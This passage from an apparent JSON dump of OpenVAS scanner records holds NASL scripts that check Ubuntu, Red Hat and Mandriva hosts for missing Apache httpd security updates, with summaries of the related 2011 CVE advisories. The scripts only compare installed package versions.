GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1259-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840798\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:23 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"USN\", value:\"1259-1\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\", \"CVE-2011-1176\");\n script_name(\"Ubuntu Update for apache2 USN-1259-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.10|10\\.04 LTS|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1259-1\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the mod_proxy module in Apache did not properly\n interact with the RewriteRule and ProxyPassMatch pattern matches\n in the configuration of a reverse proxy. 
This could allow remote\n attackers to contact internal webservers behind the proxy that were\n not intended for external exposure. (CVE-2011-3368)\n\n Stefano Nichele discovered that the mod_proxy_ajp module in Apache when\n used with mod_proxy_balancer in certain configurations could allow\n remote attackers to cause a denial of service via a malformed HTTP\n request. (CVE-2011-3348)\n\n Samuel Montosa discovered that the ITK Multi-Processing Module for\n Apache did not properly handle certain configuration sections that\n specify NiceValue but not AssignUserID, preventing Apache from dropping\n privileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu\n 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\n USN 1199-1 fixed a vulnerability in the byterange filter of Apache. The\n upstream patch introduced a regression in Apache when handling specific\n byte range requests. This update fixes the issue.\n\n Original advisory details:\n\n A flaw was discovered in the byterange filter in Apache. 
A remote attacker\n could exploit this to cause a denial of service via resource exhaustion.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.22\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:21", "description": "The remote host is missing an update for the ", "cvss3": 
{}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1391-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1391-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00015.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870617\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:34:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2011:1391-01\");\n script_name(\"RedHat Update for httpd RHSA-2011:1391-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n It was discovered that mod_proxy_ajp incorrectly returned an 'Internal\n Server Error' response when processing certain malformed HTTP requests,\n which caused the back-end server to be marked as failed in configurations\n where mod_proxy was used in load balancer mode. A remote attacker could\n cause mod_proxy to not send requests to back-end AJP (Apache JServ\n Protocol) servers for the retry timeout period or until all back-end\n servers were marked as failed. (CVE-2011-3348)\n\n Red Hat would like to thank Context Information Security for reporting the\n CVE-2011-3368 issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736592)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-04T11:27:28", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1259-1", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-1259-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840798", "href": "http://plugins.openvas.org/nasl.php?oid=840798", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1259_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for apache2 USN-1259-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the mod_proxy module in Apache did not properly\n interact with the RewriteRule and ProxyPassMatch pattern matches\n in the configuration of a reverse proxy. This could allow remote\n attackers to contact internal webservers behind the proxy that were\n not intended for external exposure. (CVE-2011-3368)\n\n Stefano Nichele discovered that the mod_proxy_ajp module in Apache when\n used with mod_proxy_balancer in certain configurations could allow\n remote attackers to cause a denial of service via a malformed HTTP\n request. (CVE-2011-3348)\n\n Samuel Montosa discovered that the ITK Multi-Processing Module for\n Apache did not properly handle certain configuration sections that\n specify NiceValue but not AssignUserID, preventing Apache from dropping\n privileges correctly. 
This issue only affected Ubuntu 10.04 LTS, Ubuntu\n 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\n USN 1199-1 fixed a vulnerability in the byterange filter of Apache. The\n upstream patch introduced a regression in Apache when handling specific\n byte range requests. This update fixes the issue.\n\n Original advisory details:\n\n A flaw was discovered in the byterange filter in Apache. A remote attacker\n could exploit this to cause a denial of service via resource exhaustion.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1259-1\";\ntag_affected = \"apache2 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1259-1/\");\n script_id(840798);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:23 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"USN\", value: \"1259-1\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\", \"CVE-2011-1176\");\n script_name(\"Ubuntu Update for apache2 USN-1259-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.22\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:49", "description": "Check for the Version of apache", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Mandriva 
Update for apache MDVSA-2012:003 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2011-3368"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:831523", "href": "http://plugins.openvas.org/nasl.php?oid=831523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2012:003 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in apache:\n Integer overflow in the ap_pregsub function in server/util.c in the\n Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21,\n when the mod_setenvif module is enabled, allows local users to gain\n privileges via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header, leading to a\n heap-based buffer overflow (CVE-2011-3607).\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n 1179239 patch is 
in place, does not properly interact with use of (1)\n RewriteRule and (2) ProxyPassMatch pattern matches for configuration\n of a reverse proxy, which allows remote attackers to send requests\n to intranet servers via a malformed URI containing an \\@ (at sign)\n character and a : (colon) character in invalid positions. NOTE: this\n vulnerability exists because of an incomplete fix for CVE-2011-3368\n (CVE-2011-4317).\n\n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"apache on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:003\");\n script_id(831523);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:49:33 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2012:003\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-4317\");\n script_name(\"Mandriva Update for apache MDVSA-2012:003 (apache)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.15mdvmes5.2\", 
rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.15mdvmes5.2\", 